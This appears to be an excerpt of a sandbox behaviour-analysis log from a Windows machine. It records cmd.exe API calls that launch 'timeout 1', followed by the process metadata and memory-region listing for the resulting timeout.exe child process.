[0372.776] _wcsicmp (_String1="timeout", _String2="VER") returned -2
[0372.776] _wcsicmp (_String1="timeout", _String2="VOL") returned -2
[0372.776] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15
[0372.776] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1
[0372.776] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15
[0372.776] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7
[0372.776] _wcsicmp (_String1="timeout", _String2="START") returned 1
[0372.776] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16
[0372.777] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9
[0372.777] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7
[0372.777] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4
[0372.777] _wcsicmp (_String1="timeout", _String2="POPD") returned 4
[0372.777] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19
[0372.777] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14
[0372.777] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18
[0372.777] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17
[0372.777] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7
[0372.777] _wcsicmp (_String1="timeout", _String2="DIR") returned 16
[0372.777] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15
[0372.777] _wcsicmp (_String1="timeout", _String2="DEL") returned 16
[0372.777] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16
[0372.777] _wcsicmp (_String1="timeout", _String2="COPY") returned 17
[0372.778] _wcsicmp (_String1="timeout", _String2="CD") returned 17
[0372.778] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17
[0372.778] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2
[0372.778] _wcsicmp (_String1="timeout", _String2="REN") returned 2
[0372.778] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15
[0372.778] _wcsicmp (_String1="timeout", _String2="SET") returned 1
[0372.778] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4
[0372.778] _wcsicmp (_String1="timeout", _String2="DATE") returned 16
[0372.778] _wcsicmp (_String1="timeout", _String2="TIME") returned 111
[0372.778] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4
[0372.778] _wcsicmp (_String1="timeout", _String2="MD") returned 7
[0372.778] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7
[0372.778] _wcsicmp (_String1="timeout", _String2="RD") returned 2
[0372.778] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2
[0372.779] _wcsicmp (_String1="timeout", _String2="PATH") returned 4
[0372.779] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13
[0372.779] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1
[0372.779] _wcsicmp (_String1="timeout", _String2="CLS") returned 17
[0372.779] _wcsicmp (_String1="timeout", _String2="CALL") returned 17
[0372.779] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2
[0372.779] _wcsicmp (_String1="timeout", _String2="VER") returned -2
[0372.779] _wcsicmp (_String1="timeout", _String2="VOL") returned -2
[0372.779] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15
[0372.779] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1
[0372.779] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15
[0372.779] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7
[0372.779] _wcsicmp (_String1="timeout", _String2="START") returned 1
[0372.779] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16
[0372.779] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9
[0372.779] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7
[0372.779] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4
[0372.780] _wcsicmp (_String1="timeout", _String2="POPD") returned 4
[0372.780] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19
[0372.780] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14
[0372.780] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18
[0372.780] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17
[0372.780] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7
[0372.780] _wcsicmp (_String1="timeout", _String2="FOR") returned 14
[0372.780] _wcsicmp (_String1="timeout", _String2="IF") returned 11
[0372.780] _wcsicmp (_String1="timeout", _String2="REM") returned 2
[0372.781] GetProcessHeap () returned 0x70000
[0372.781] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x218) returned 0x8af20
[0372.781] GetProcessHeap () returned 0x70000
[0372.781] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x26) returned 0x847e0
[0372.781] _wcsnicmp (_String1="time", _String2="cmd ", _MaxCount=0x4) returned 17
[0372.782] GetProcessHeap () returned 0x70000
[0372.782] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x420) returned 0x8b140
[0372.782] SetErrorMode (uMode=0x0) returned 0x8001
[0372.782] SetErrorMode (uMode=0x1) returned 0x0
[0372.782] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x8b150, lpFilePart=0x2af1a0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2af1a0*="system32") returned 0x13
[0372.783] SetErrorMode (uMode=0x8001) returned 0x1
[0372.783] GetProcessHeap () returned 0x70000
[0372.783] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x8b140, Size=0x48) returned 0x8b140
[0372.783] GetProcessHeap () returned 0x70000
[0372.783] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x8b140) returned 0x48
[0372.783] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0372.783] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0372.784] GetProcessHeap () returned 0x70000
[0372.784] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x1ce) returned 0x8b1a0
[0372.784] GetProcessHeap () returned 0x70000
[0372.784] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x38c) returned 0x8b380
[0372.797] GetProcessHeap () returned 0x70000
[0372.797] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x8b380, Size=0x1d0) returned 0x8b380
[0372.797] GetProcessHeap () returned 0x70000
[0372.797] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x8b380) returned 0x1d0
[0372.797] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0372.797] GetProcessHeap () returned 0x70000
[0372.797] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xe8) returned 0x71d50
[0372.797] GetProcessHeap () returned 0x70000
[0372.797] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x71d50, Size=0x7e) returned 0x71d50
[0372.798] GetProcessHeap () returned 0x70000
[0372.798] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x71d50) returned 0x7e
[0372.798] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0372.798] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.*" (normalized: "c:\\windows\\system32\\timeout.*"), fInfoLevelId=0x1, lpFindFileData=0x2aef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef10) returned 0x71a80
[0372.798] GetProcessHeap () returned 0x70000
[0372.798] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x847b0, Size=0x8) returned 0x88630
[0372.798] FindClose (in: hFindFile=0x71a80 | out: hFindFile=0x71a80) returned 1
[0372.799] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.COM" (normalized: "c:\\windows\\system32\\timeout.com"), fInfoLevelId=0x1, lpFindFileData=0x2aef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef10) returned 0xffffffffffffffff
[0372.799] GetLastError () returned 0x2
[0372.799] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.EXE" (normalized: "c:\\windows\\system32\\timeout.exe"), fInfoLevelId=0x1, lpFindFileData=0x2aef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aef10) returned 0x71a80
[0372.799] FindClose (in: hFindFile=0x71a80 | out: hFindFile=0x71a80) returned 1
[0372.800] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0372.800] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0372.800] GetConsoleTitleW (in: lpConsoleTitle=0x2af460, nSize=0x104 | out: lpConsoleTitle="taskeng.exe") returned 0xb
[0372.800] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af218, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af1d8 | out: lpAttributeList=0x2af218, lpSize=0x2af1d8) returned 1
[0372.800] UpdateProcThreadAttribute (in: lpAttributeList=0x2af218, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af1c8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af218, lpPreviousValue=0x0) returned 1
[0372.800] GetStartupInfoW (in: lpStartupInfo=0x2af330 | out: lpStartupInfo=0x2af330*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0372.801] GetProcessHeap () returned 0x70000
[0372.801] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x20) returned 0x847b0
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
[0372.801] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.802] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.803] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.804] GetProcessHeap () returned 0x70000
[0372.804] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x847b0 | out: hHeap=0x70000) returned 1
[0372.804] GetProcessHeap () returned 0x70000
[0372.804] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x12) returned 0x88650
[0372.804] lstrcmpW (lpString1="\\timeout.exe", lpString2="\\XCOPY.EXE") returned -1
[0372.808] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\timeout.exe", lpCommandLine="timeout 1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2af250*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="timeout 1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af200 | out: lpCommandLine="timeout 1", lpProcessInformation=0x2af200*(hProcess=0x58, hThread=0x54, dwProcessId=0xc10, dwThreadId=0xc0c)) returned 1
[0372.851] CloseHandle (hObject=0x54) returned 1
[0372.852] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0372.852] GetProcessHeap () returned 0x70000
[0372.852] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8baa0 | out: hHeap=0x70000) returned 1
[0372.852] GetEnvironmentStringsW () returned 0x8b940*
[0372.852] GetProcessHeap () returned 0x70000
[0372.852] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb78) returned 0x8c4c0
[0372.852] memcpy (in: _Dst=0x8c4c0, _Src=0x8b940, _Size=0xb78 | out: _Dst=0x8c4c0) returned 0x8c4c0
[0372.853] FreeEnvironmentStringsW (penv=0x8b940) returned 1
[0372.853] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0
[0373.777] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x2af148 | out: lpExitCode=0x2af148*=0x0) returned 1
[0373.777] CloseHandle (hObject=0x58) returned 1
[0373.777] _vsnwprintf (in: _Buffer=0x2af3b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af158 | out: _Buffer="00000000") returned 8
[0373.778] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0373.778] GetProcessHeap () returned 0x70000
[0373.778] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8c4c0 | out: hHeap=0x70000) returned 1
[0373.778] GetEnvironmentStringsW () returned 0x8b940*
[0373.779] GetProcessHeap () returned 0x70000
[0373.779] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb9e) returned 0x8dbf0
[0373.779] memcpy (in: _Dst=0x8dbf0, _Src=0x8b940, _Size=0xb9e | out: _Dst=0x8dbf0) returned 0x8dbf0
[0373.779] FreeEnvironmentStringsW (penv=0x8b940) returned 1
[0373.779] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0373.779] GetProcessHeap () returned 0x70000
[0373.779] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8dbf0 | out: hHeap=0x70000) returned 1
[0373.779] GetEnvironmentStringsW () returned 0x8b940*
[0373.780] GetProcessHeap () returned 0x70000
[0373.780] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb9e) returned 0x8dbf0
[0373.780] memcpy (in: _Dst=0x8dbf0, _Src=0x8b940, _Size=0xb9e | out: _Dst=0x8dbf0) returned 0x8dbf0
[0373.780] FreeEnvironmentStringsW (penv=0x8b940) returned 1
[0373.780] GetProcessHeap () returned 0x70000
[0373.780] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x88650 | out: hHeap=0x70000) returned 1
[0373.780] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af218 | out: lpAttributeList=0x2af218)
[0373.780] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.780] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0373.781] _get_osfhandle (_FileHandle=1) returned 0x7
[0373.781] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0373.782] _get_osfhandle (_FileHandle=0) returned 0x3
[0373.782] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0373.783] _get_osfhandle (_FileHandle=0) returned 0x3
[0373.783] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
[0373.783] SetConsoleInputExeNameW () returned 0x1
[0373.783] GetConsoleOutputCP () returned 0x1b5
[0373.784] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0373.784] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0373.784] exit (_Code=0)
Process:
id = "7"
image_name = "timeout.exe"
filename = "c:\\windows\\system32\\timeout.exe"
page_root = "0x1fad1000"
os_pid = "0xc10"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xb48"
cmd_line = "timeout 1"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1593
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1594
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1595
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1596
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1597
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1598
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1599
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1600
start_va = 0xff740000
end_va = 0xff74bfff
monitored = 1
entry_point = 0xff746830
region_type = mapped_file
name = "timeout.exe"
filename = "\\Windows\\System32\\timeout.exe" (normalized: "c:\\windows\\system32\\timeout.exe")
Region:
id = 1601
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1602
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1603
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1604
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1605
start_va = 0x250000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1606
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1607
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1608
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1609
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1610
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1611
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1612
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1613
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1614
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1615
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1616
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1617
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1618
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1619
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1620
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1621
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1622
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1623
start_va = 0xc0000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1624
start_va = 0x250000
end_va = 0x34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1625
start_va = 0x410000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 1626
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1627
start_va = 0x130000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 1628
start_va = 0x510000
end_va = 0x697fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000510000"
filename = ""
Region:
id = 1629
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1630
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1631
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1632
start_va = 0x6a0000
end_va = 0x820fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006a0000"
filename = ""
Region:
id = 1633
start_va = 0x830000
end_va = 0x1c2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000830000"
filename = ""
Region:
id = 1634
start_va = 0xc0000
end_va = 0xc1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "timeout.exe.mui"
filename = "\\Windows\\System32\\en-US\\timeout.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\timeout.exe.mui")
Region:
id = 1635
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1636
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1637
start_va = 0x1c30000
end_va = 0x1efefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 84
os_tid = 0xc0c
